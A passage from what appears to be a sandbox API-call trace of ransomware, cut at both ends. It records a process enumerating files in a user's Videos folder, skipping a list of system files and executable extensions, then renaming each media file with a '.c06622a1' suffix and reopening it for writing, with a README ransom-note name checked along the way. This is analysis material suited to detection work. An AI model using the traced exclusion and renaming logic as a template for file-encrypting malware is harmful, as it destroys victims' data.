HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\4-qA 6xhtA1BI.mkv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\483duoej6\\4-qa 6xhta1bi.mkv.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x2e0 [0156.668] CreateIoCompletionPort (FileHandle=0x2e0, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0156.668] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x48b0020 [0156.673] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x718e353d [0156.673] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x47546528 [0156.673] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2de07987 [0156.674] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x59e6c61 [0156.674] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2a1b421d [0156.674] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x28013d0e [0156.674] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6d76b935 [0156.674] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x66f89ce2 [0156.677] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x48b0094, Length=0x80) returned 0x319d66a5 [0156.677] RtlComputeCrc32 (PartialCrc=0x66a5, Buffer=0x48b0094, Length=0x80) returned 0xe20b22e8 [0156.677] RtlComputeCrc32 (PartialCrc=0x22e8, Buffer=0x48b0094, Length=0x80) returned 0xd6ad0551 [0156.677] RtlComputeCrc32 (PartialCrc=0x551, Buffer=0x48b0094, Length=0x80) returned 0xcd1449a4 [0156.677] RtlComputeCrc32 (PartialCrc=0x49a4, Buffer=0x48b0094, Length=0x80) returned 0x220b844d [0156.677] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x48b0020) returned 1 [0156.677] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45900d8) returned 1 [0156.677] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45a00e0) returned 1 [0156.677] FindNextFileW (in: hFindFile=0x2db8840, lpFindFileData=0x3fe2ec | out: lpFindFileData=0x3fe2ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16be4740, ftCreationTime.dwHighDateTime=0x1d5e4b5, ftLastAccessTime.dwLowDateTime=0xca2a3380, ftLastAccessTime.dwHighDateTime=0x1d5d834, ftLastWriteTime.dwLowDateTime=0xca2a3380, ftLastWriteTime.dwHighDateTime=0x1d5d834, nFileSizeHigh=0x0, nFileSizeLow=0x6c66, dwReserved0=0x0, dwReserved1=0x0, cFileName="ami1FOL1V 7AbUHpa9.avi", cAlternateFileName="AMI1FO~1.AVI")) returned 1 [0156.677] _wcsicmp (_Str1="ami1FOL1V 7AbUHpa9.avi", _Str2="README.c06622a1.TXT") returned -17 [0156.677] wcsstr (_Str="ami1FOL1V 7AbUHpa9.avi", _SubStr="README") returned 0x0 [0156.677] _wcsicmp (_Str1="autorun.inf", _Str2="ami1FOL1V 7AbUHpa9.avi") returned 8 [0156.677] wcslen (_String="autorun.inf") returned 0xb [0156.677] _wcsicmp (_Str1="boot.ini", _Str2="ami1FOL1V 7AbUHpa9.avi") returned 1 [0156.677] wcslen (_String="boot.ini") returned 0x8 [0156.677] _wcsicmp (_Str1="bootfont.bin", _Str2="ami1FOL1V 7AbUHpa9.avi") returned 1 [0156.677] wcslen (_String="bootfont.bin") returned 0xc [0156.677] _wcsicmp (_Str1="bootsect.bak", _Str2="ami1FOL1V 7AbUHpa9.avi") returned 1 [0156.677] wcslen (_String="bootsect.bak") returned 0xc [0156.677] _wcsicmp (_Str1="desktop.ini", _Str2="ami1FOL1V 7AbUHpa9.avi") returned 3 [0156.677] wcslen (_String="desktop.ini") returned 0xb [0156.677] _wcsicmp (_Str1="iconcache.db", _Str2="ami1FOL1V 7AbUHpa9.avi") returned 8 [0156.677] wcslen (_String="iconcache.db") returned 0xc [0156.677] _wcsicmp (_Str1="ntldr", _Str2="ami1FOL1V 7AbUHpa9.avi") returned 13 [0156.677] wcslen (_String="ntldr") returned 0x5 [0156.677] _wcsicmp (_Str1="ntuser.dat", _Str2="ami1FOL1V 7AbUHpa9.avi") returned 13 [0156.677] wcslen (_String="ntuser.dat") returned 0xa [0156.677] _wcsicmp (_Str1="ntuser.dat.log", _Str2="ami1FOL1V 7AbUHpa9.avi") returned 13 [0156.678] wcslen (_String="ntuser.dat.log") returned 0xe [0156.678] _wcsicmp (_Str1="ntuser.ini", _Str2="ami1FOL1V 7AbUHpa9.avi") returned 13 [0156.678] wcslen (_String="ntuser.ini") returned 0xa [0156.678] _wcsicmp (_Str1="thumbs.db", _Str2="ami1FOL1V 7AbUHpa9.avi") returned 19 [0156.678] wcslen (_String="thumbs.db") returned 0x9 [0156.678] _wcsicmp (_Str1="386", _Str2="avi") returned -46 [0156.678] wcslen (_String="386") returned 0x3 [0156.678] _wcsicmp (_Str1="adv", _Str2="avi") returned -18 [0156.678] wcslen (_String="adv") returned 0x3 [0156.678] _wcsicmp (_Str1="ani", _Str2="avi") returned -8 [0156.678] wcslen (_String="ani") returned 0x3 [0156.678] _wcsicmp (_Str1="bat", _Str2="avi") returned 1 [0156.678] wcslen (_String="bat") returned 0x3 [0156.678] _wcsicmp (_Str1="bin", _Str2="avi") returned 1 [0156.678] wcslen (_String="bin") returned 0x3 [0156.678] _wcsicmp (_Str1="cab", _Str2="avi") returned 2 [0156.678] wcslen (_String="cab") returned 0x3 [0156.678] _wcsicmp (_Str1="cmd", _Str2="avi") returned 2 [0156.678] wcslen (_String="cmd") returned 0x3 [0156.678] _wcsicmp (_Str1="com", _Str2="avi") returned 2 [0156.678] wcslen (_String="com") returned 0x3 [0156.678] _wcsicmp (_Str1="cpl", _Str2="avi") returned 2 [0156.678] wcslen (_String="cpl") returned 0x3 [0156.678] _wcsicmp (_Str1="cur", _Str2="avi") returned 2 [0156.678] wcslen (_String="cur") returned 0x3 [0156.678] _wcsicmp (_Str1="deskthemepack", _Str2="avi") returned 3 [0156.678] wcslen (_String="deskthemepack") returned 0xd [0156.678] _wcsicmp (_Str1="diagcab", _Str2="avi") returned 3 [0156.678] wcslen (_String="diagcab") returned 0x7 [0156.678] _wcsicmp (_Str1="diagcfg", _Str2="avi") returned 3 [0156.678] wcslen (_String="diagcfg") returned 0x7 [0156.678] _wcsicmp (_Str1="diagpkg", _Str2="avi") returned 3 [0156.678] wcslen (_String="diagpkg") returned 0x7 [0156.679] _wcsicmp (_Str1="dll", _Str2="avi") returned 3 [0156.679] wcslen (_String="dll") returned 0x3 [0156.679] _wcsicmp (_Str1="drv", _Str2="avi") returned 3 [0156.679] wcslen (_String="drv") returned 0x3 [0156.679] _wcsicmp (_Str1="exe", _Str2="avi") returned 4 [0156.679] wcslen (_String="exe") returned 0x3 [0156.679] _wcsicmp (_Str1="hlp", _Str2="avi") returned 7 [0156.679] wcslen (_String="hlp") returned 0x3 [0156.679] _wcsicmp (_Str1="icl", _Str2="avi") returned 8 [0156.679] wcslen (_String="icl") returned 0x3 [0156.679] _wcsicmp (_Str1="icns", _Str2="avi") returned 8 [0156.679] wcslen (_String="icns") returned 0x4 [0156.679] _wcsicmp (_Str1="ico", _Str2="avi") returned 8 [0156.679] wcslen (_String="ico") returned 0x3 [0156.679] _wcsicmp (_Str1="ics", _Str2="avi") returned 8 [0156.679] wcslen (_String="ics") returned 0x3 [0156.679] _wcsicmp (_Str1="idx", _Str2="avi") returned 8 [0156.679] wcslen (_String="idx") returned 0x3 [0156.679] _wcsicmp (_Str1="ldf", _Str2="avi") returned 11 [0156.679] wcslen (_String="ldf") returned 0x3 [0156.679] _wcsicmp (_Str1="lnk", _Str2="avi") returned 11 [0156.679] wcslen (_String="lnk") returned 0x3 [0156.679] _wcsicmp (_Str1="mod", _Str2="avi") returned 12 [0156.679] wcslen (_String="mod") returned 0x3 [0156.679] _wcsicmp (_Str1="mpa", _Str2="avi") returned 12 [0156.679] wcslen (_String="mpa") returned 0x3 [0156.679] _wcsicmp (_Str1="msc", _Str2="avi") returned 12 [0156.679] wcslen (_String="msc") returned 0x3 [0156.679] _wcsicmp (_Str1="msp", _Str2="avi") returned 12 [0156.679] wcslen (_String="msp") returned 0x3 [0156.679] _wcsicmp (_Str1="msstyles", _Str2="avi") returned 12 [0156.679] wcslen (_String="msstyles") returned 0x8 [0156.679] _wcsicmp (_Str1="msu", _Str2="avi") returned 12 [0156.679] wcslen (_String="msu") returned 0x3 [0156.680] _wcsicmp (_Str1="nls", _Str2="avi") returned 13 [0156.680] wcslen (_String="nls") returned 0x3 [0156.680] _wcsicmp (_Str1="nomedia", _Str2="avi") returned 13 [0156.680] wcslen (_String="nomedia") returned 0x7 [0156.680] _wcsicmp (_Str1="ocx", _Str2="avi") returned 14 [0156.680] wcslen (_String="ocx") returned 0x3 [0156.680] _wcsicmp (_Str1="prf", _Str2="avi") returned 15 [0156.680] wcslen (_String="prf") returned 0x3 [0156.680] _wcsicmp (_Str1="ps1", _Str2="avi") returned 15 [0156.680] wcslen (_String="ps1") returned 0x3 [0156.680] _wcsicmp (_Str1="rom", _Str2="avi") returned 17 [0156.680] wcslen (_String="rom") returned 0x3 [0156.680] _wcsicmp (_Str1="rtp", _Str2="avi") returned 17 [0156.680] wcslen (_String="rtp") returned 0x3 [0156.680] _wcsicmp (_Str1="scr", _Str2="avi") returned 18 [0156.680] wcslen (_String="scr") returned 0x3 [0156.680] _wcsicmp (_Str1="shs", _Str2="avi") returned 18 [0156.680] wcslen (_String="shs") returned 0x3 [0156.680] _wcsicmp (_Str1="spl", _Str2="avi") returned 18 [0156.680] wcslen (_String="spl") returned 0x3 [0156.680] _wcsicmp (_Str1="sys", _Str2="avi") returned 18 [0156.680] wcslen (_String="sys") returned 0x3 [0156.680] _wcsicmp (_Str1="theme", _Str2="avi") returned 19 [0156.680] wcslen (_String="theme") returned 0x5 [0156.680] _wcsicmp (_Str1="themepack", _Str2="avi") returned 19 [0156.680] wcslen (_String="themepack") returned 0x9 [0156.680] _wcsicmp (_Str1="wpx", _Str2="avi") returned 22 [0156.680] wcslen (_String="wpx") returned 0x3 [0156.680] _wcsicmp (_Str1="lock", _Str2="avi") returned 11 [0156.680] wcslen (_String="lock") returned 0x4 [0156.680] _wcsicmp (_Str1="key", _Str2="avi") returned 10 [0156.680] wcslen (_String="key") returned 0x3 [0156.680] _wcsicmp (_Str1="hta", _Str2="avi") returned 7 [0156.680] wcslen (_String="hta") returned 0x3 [0156.681] _wcsicmp (_Str1="msi", _Str2="avi") returned 12 [0156.681] wcslen (_String="msi") returned 0x3 [0156.681] _wcsicmp (_Str1="pdb", _Str2="avi") returned 15 [0156.681] wcslen (_String="pdb") returned 0x3 [0156.681] _wcsicmp (_Str1="sql", _Str2="avi") returned 18 [0156.681] wcslen (_String="sql") returned 0x3 [0156.681] _wcsicmp (_Str1="sqlite", _Str2="avi") returned 18 [0156.681] wcslen (_String="sqlite") returned 0x6 [0156.681] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\483duoej6")) returned 0x10 [0156.681] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45900d8 [0156.681] wcscpy (in: _Dest=0x45900d8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6" [0156.681] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6") returned 0x52 [0156.681] wcscpy (in: _Dest=0x459017e, _Source="ami1FOL1V 7AbUHpa9.avi" | out: _Dest="ami1FOL1V 7AbUHpa9.avi") returned="ami1FOL1V 7AbUHpa9.avi" [0156.681] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\ami1FOL1V 7AbUHpa9.avi", dwFileAttributes=0x80) returned 1 [0156.681] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\ami1FOL1V 7AbUHpa9.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\483duoej6\\ami1fol1v 7abuhpa9.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x620 [0156.681] SetFilePointerEx (in: hFile=0x620, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.681] ReadFile (in: hFile=0x620, lpBuffer=0x3fe174, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe204, lpOverlapped=0x0 | out: lpBuffer=0x3fe174*, lpNumberOfBytesRead=0x3fe204*=0x90, lpOverlapped=0x0) returned 1 [0156.682] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe174, Length=0x80) returned 0x6fdadcb1 [0156.682] RtlComputeCrc32 (PartialCrc=0xdcb1, Buffer=0x3fe174, Length=0x80) returned 0x4f9b974c [0156.682] RtlComputeCrc32 (PartialCrc=0x974c, Buffer=0x3fe174, Length=0x80) returned 0x694087a1 [0156.682] RtlComputeCrc32 (PartialCrc=0x87a1, Buffer=0x3fe174, Length=0x80) returned 0x9857d75d [0156.682] RtlComputeCrc32 (PartialCrc=0xd75d, Buffer=0x3fe174, Length=0x80) returned 0x384a9683 [0156.682] CloseHandle (hObject=0x620) returned 1 [0156.682] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45a00e0 [0156.682] wcscpy (in: _Dest=0x45a00e0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\ami1FOL1V 7AbUHpa9.avi" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\ami1FOL1V 7AbUHpa9.avi") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\ami1FOL1V 7AbUHpa9.avi" [0156.682] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\ami1FOL1V 7AbUHpa9.avi") returned 0x69 [0156.682] wcscpy (in: _Dest=0x45a01b2, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.683] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\ami1FOL1V 7AbUHpa9.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\483duoej6\\ami1fol1v 7abuhpa9.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\ami1FOL1V 7AbUHpa9.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\483duoej6\\ami1fol1v 7abuhpa9.avi.c06622a1"), dwFlags=0x8) returned 1 [0156.685] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\ami1FOL1V 7AbUHpa9.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\483duoej6\\ami1fol1v 7abuhpa9.avi.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x620 [0156.685] CreateIoCompletionPort (FileHandle=0x620, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0156.685] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4940020 [0156.691] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x55f341a [0156.691] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2f1e27f4 [0156.691] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4a1fa88a [0156.691] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x56863417 [0156.691] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1e5fea28 [0156.691] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5d4188ef [0156.691] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x27add58f [0156.691] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5e0a2f40 [0156.694] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4940094, Length=0x80) returned 0x67aff525 [0156.694] RtlComputeCrc32 (PartialCrc=0xf525, Buffer=0x4940094, Length=0x80) returned 0xdfcb5fff [0156.694] RtlComputeCrc32 (PartialCrc=0x5fff, Buffer=0x4940094, Length=0x80) returned 0xdef7077a [0156.694] RtlComputeCrc32 (PartialCrc=0x77a, Buffer=0x4940094, Length=0x80) returned 0xbd5fd81e [0156.694] RtlComputeCrc32 (PartialCrc=0xd81e, Buffer=0x4940094, Length=0x80) returned 0xeea04472 [0156.694] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4940020) returned 1 [0156.694] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45900d8) returned 1 [0156.694] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45a00e0) returned 1 [0156.694] FindNextFileW (in: hFindFile=0x2db8840, lpFindFileData=0x3fe2ec | out: lpFindFileData=0x3fe2ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x567a4510, ftCreationTime.dwHighDateTime=0x1d5e630, ftLastAccessTime.dwLowDateTime=0x7f55cea0, ftLastAccessTime.dwHighDateTime=0x1d5d93d, ftLastWriteTime.dwLowDateTime=0x7f55cea0, ftLastWriteTime.dwHighDateTime=0x1d5d93d, nFileSizeHigh=0x0, nFileSizeLow=0x15944, dwReserved0=0x0, dwReserved1=0x0, cFileName="MD5K7oNBbNoUReLGp.mp4", cAlternateFileName="MD5K7O~1.MP4")) returned 1 [0156.694] _wcsicmp (_Str1="MD5K7oNBbNoUReLGp.mp4", _Str2="README.c06622a1.TXT") returned -5 [0156.694] wcsstr (_Str="MD5K7oNBbNoUReLGp.mp4", _SubStr="README") returned 0x0 [0156.694] _wcsicmp (_Str1="autorun.inf", _Str2="MD5K7oNBbNoUReLGp.mp4") returned -12 [0156.694] wcslen (_String="autorun.inf") returned 0xb [0156.695] _wcsicmp (_Str1="boot.ini", _Str2="MD5K7oNBbNoUReLGp.mp4") returned -11 [0156.695] wcslen (_String="boot.ini") returned 0x8 [0156.695] _wcsicmp (_Str1="bootfont.bin", _Str2="MD5K7oNBbNoUReLGp.mp4") returned -11 [0156.695] wcslen (_String="bootfont.bin") returned 0xc [0156.695] _wcsicmp (_Str1="bootsect.bak", _Str2="MD5K7oNBbNoUReLGp.mp4") returned -11 [0156.695] wcslen (_String="bootsect.bak") returned 0xc [0156.695] _wcsicmp (_Str1="desktop.ini", _Str2="MD5K7oNBbNoUReLGp.mp4") returned -9 [0156.695] wcslen (_String="desktop.ini") returned 0xb [0156.695] _wcsicmp (_Str1="iconcache.db", _Str2="MD5K7oNBbNoUReLGp.mp4") returned -4 [0156.695] wcslen (_String="iconcache.db") returned 0xc [0156.695] _wcsicmp (_Str1="ntldr", _Str2="MD5K7oNBbNoUReLGp.mp4") returned 1 [0156.695] wcslen (_String="ntldr") returned 0x5 [0156.695] _wcsicmp (_Str1="ntuser.dat", _Str2="MD5K7oNBbNoUReLGp.mp4") returned 1 [0156.695] wcslen (_String="ntuser.dat") returned 0xa [0156.695] _wcsicmp (_Str1="ntuser.dat.log", _Str2="MD5K7oNBbNoUReLGp.mp4") returned 1 [0156.695] wcslen (_String="ntuser.dat.log") returned 0xe [0156.695] _wcsicmp (_Str1="ntuser.ini", _Str2="MD5K7oNBbNoUReLGp.mp4") returned 1 [0156.695] wcslen (_String="ntuser.ini") returned 0xa [0156.695] _wcsicmp (_Str1="thumbs.db", _Str2="MD5K7oNBbNoUReLGp.mp4") returned 7 [0156.695] wcslen (_String="thumbs.db") returned 0x9 [0156.695] _wcsicmp (_Str1="386", _Str2="mp4") returned -58 [0156.695] wcslen (_String="386") returned 0x3 [0156.695] _wcsicmp (_Str1="adv", _Str2="mp4") returned -12 [0156.695] wcslen (_String="adv") returned 0x3 [0156.695] _wcsicmp (_Str1="ani", _Str2="mp4") returned -12 [0156.695] wcslen (_String="ani") returned 0x3 [0156.695] _wcsicmp (_Str1="bat", _Str2="mp4") returned -11 [0156.695] wcslen (_String="bat") returned 0x3 [0156.695] _wcsicmp (_Str1="bin", _Str2="mp4") returned -11 [0156.695] wcslen (_String="bin") returned 0x3 [0156.695] _wcsicmp (_Str1="cab", _Str2="mp4") returned -10 [0156.695] wcslen (_String="cab") returned 0x3 [0156.695] _wcsicmp (_Str1="cmd", _Str2="mp4") returned -10 [0156.695] wcslen (_String="cmd") returned 0x3 [0156.696] _wcsicmp (_Str1="com", _Str2="mp4") returned -10 [0156.696] wcslen (_String="com") returned 0x3 [0156.696] _wcsicmp (_Str1="cpl", _Str2="mp4") returned -10 [0156.696] wcslen (_String="cpl") returned 0x3 [0156.696] _wcsicmp (_Str1="cur", _Str2="mp4") returned -10 [0156.696] wcslen (_String="cur") returned 0x3 [0156.696] _wcsicmp (_Str1="deskthemepack", _Str2="mp4") returned -9 [0156.696] wcslen (_String="deskthemepack") returned 0xd [0156.696] _wcsicmp (_Str1="diagcab", _Str2="mp4") returned -9 [0156.696] wcslen (_String="diagcab") returned 0x7 [0156.696] _wcsicmp (_Str1="diagcfg", _Str2="mp4") returned -9 [0156.696] wcslen (_String="diagcfg") returned 0x7 [0156.696] _wcsicmp (_Str1="diagpkg", _Str2="mp4") returned -9 [0156.696] wcslen (_String="diagpkg") returned 0x7 [0156.696] _wcsicmp (_Str1="dll", _Str2="mp4") returned -9 [0156.696] wcslen (_String="dll") returned 0x3 [0156.696] _wcsicmp (_Str1="drv", _Str2="mp4") returned -9 [0156.696] wcslen (_String="drv") returned 0x3 [0156.696] _wcsicmp (_Str1="exe", _Str2="mp4") returned -8 [0156.696] wcslen (_String="exe") returned 0x3 [0156.696] _wcsicmp (_Str1="hlp", _Str2="mp4") returned -5 [0156.696] wcslen (_String="hlp") returned 0x3 [0156.696] _wcsicmp (_Str1="icl", _Str2="mp4") returned -4 [0156.696] wcslen (_String="icl") returned 0x3 [0156.696] _wcsicmp (_Str1="icns", _Str2="mp4") returned -4 [0156.696] wcslen (_String="icns") returned 0x4 [0156.696] _wcsicmp (_Str1="ico", _Str2="mp4") returned -4 [0156.696] wcslen (_String="ico") returned 0x3 [0156.696] _wcsicmp (_Str1="ics", _Str2="mp4") returned -4 [0156.696] wcslen (_String="ics") returned 0x3 [0156.696] _wcsicmp (_Str1="idx", _Str2="mp4") returned -4 [0156.696] wcslen (_String="idx") returned 0x3 [0156.696] _wcsicmp (_Str1="ldf", _Str2="mp4") returned -1 [0156.697] wcslen (_String="ldf") returned 0x3 [0156.697] _wcsicmp (_Str1="lnk", _Str2="mp4") returned -1 [0156.697] wcslen (_String="lnk") returned 0x3 [0156.697] _wcsicmp (_Str1="mod", _Str2="mp4") returned -1 [0156.697] wcslen (_String="mod") returned 0x3 [0156.697] _wcsicmp (_Str1="mpa", _Str2="mp4") returned 45 [0156.697] wcslen (_String="mpa") returned 0x3 [0156.697] _wcsicmp (_Str1="msc", _Str2="mp4") returned 3 [0156.697] wcslen (_String="msc") returned 0x3 [0156.697] _wcsicmp (_Str1="msp", _Str2="mp4") returned 3 [0156.697] wcslen (_String="msp") returned 0x3 [0156.697] _wcsicmp (_Str1="msstyles", _Str2="mp4") returned 3 [0156.697] wcslen (_String="msstyles") returned 0x8 [0156.697] _wcsicmp (_Str1="msu", _Str2="mp4") returned 3 [0156.697] wcslen (_String="msu") returned 0x3 [0156.697] _wcsicmp (_Str1="nls", _Str2="mp4") returned 1 [0156.697] wcslen (_String="nls") returned 0x3 [0156.697] _wcsicmp (_Str1="nomedia", _Str2="mp4") returned 1 [0156.697] wcslen (_String="nomedia") returned 0x7 [0156.697] _wcsicmp (_Str1="ocx", _Str2="mp4") returned 2 [0156.697] wcslen (_String="ocx") returned 0x3 [0156.697] _wcsicmp (_Str1="prf", _Str2="mp4") returned 3 [0156.697] wcslen (_String="prf") returned 0x3 [0156.697] _wcsicmp (_Str1="ps1", _Str2="mp4") returned 3 [0156.697] wcslen (_String="ps1") returned 0x3 [0156.697] _wcsicmp (_Str1="rom", _Str2="mp4") returned 5 [0156.697] wcslen (_String="rom") returned 0x3 [0156.697] _wcsicmp (_Str1="rtp", _Str2="mp4") returned 5 [0156.697] wcslen (_String="rtp") returned 0x3 [0156.697] _wcsicmp (_Str1="scr", _Str2="mp4") returned 6 [0156.697] wcslen (_String="scr") returned 0x3 [0156.697] _wcsicmp (_Str1="shs", _Str2="mp4") returned 6 [0156.697] wcslen (_String="shs") returned 0x3 [0156.698] _wcsicmp (_Str1="spl", _Str2="mp4") returned 6 [0156.698] wcslen (_String="spl") returned 0x3 [0156.698] _wcsicmp (_Str1="sys", _Str2="mp4") returned 6 [0156.698] wcslen (_String="sys") returned 0x3 [0156.698] _wcsicmp (_Str1="theme", _Str2="mp4") returned 7 [0156.698] wcslen (_String="theme") returned 0x5 [0156.698] _wcsicmp (_Str1="themepack", _Str2="mp4") returned 7 [0156.698] wcslen (_String="themepack") returned 0x9 [0156.698] _wcsicmp (_Str1="wpx", _Str2="mp4") returned 10 [0156.698] wcslen (_String="wpx") returned 0x3 [0156.698] _wcsicmp (_Str1="lock", _Str2="mp4") returned -1 [0156.698] wcslen (_String="lock") returned 0x4 [0156.698] _wcsicmp (_Str1="key", _Str2="mp4") returned -2 [0156.698] wcslen (_String="key") returned 0x3 [0156.698] _wcsicmp (_Str1="hta", _Str2="mp4") returned -5 [0156.698] wcslen (_String="hta") returned 0x3 [0156.698] _wcsicmp (_Str1="msi", _Str2="mp4") returned 3 [0156.698] wcslen (_String="msi") returned 0x3 [0156.698] _wcsicmp (_Str1="pdb", _Str2="mp4") returned 3 [0156.698] wcslen (_String="pdb") returned 0x3 [0156.698] _wcsicmp (_Str1="sql", _Str2="mp4") returned 6 [0156.698] wcslen (_String="sql") returned 0x3 [0156.698] _wcsicmp (_Str1="sqlite", _Str2="mp4") returned 6 [0156.698] wcslen (_String="sqlite") returned 0x6 [0156.698] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\483duoej6")) returned 0x10 [0156.698] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45900d8 [0156.698] wcscpy (in: _Dest=0x45900d8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6" | out: 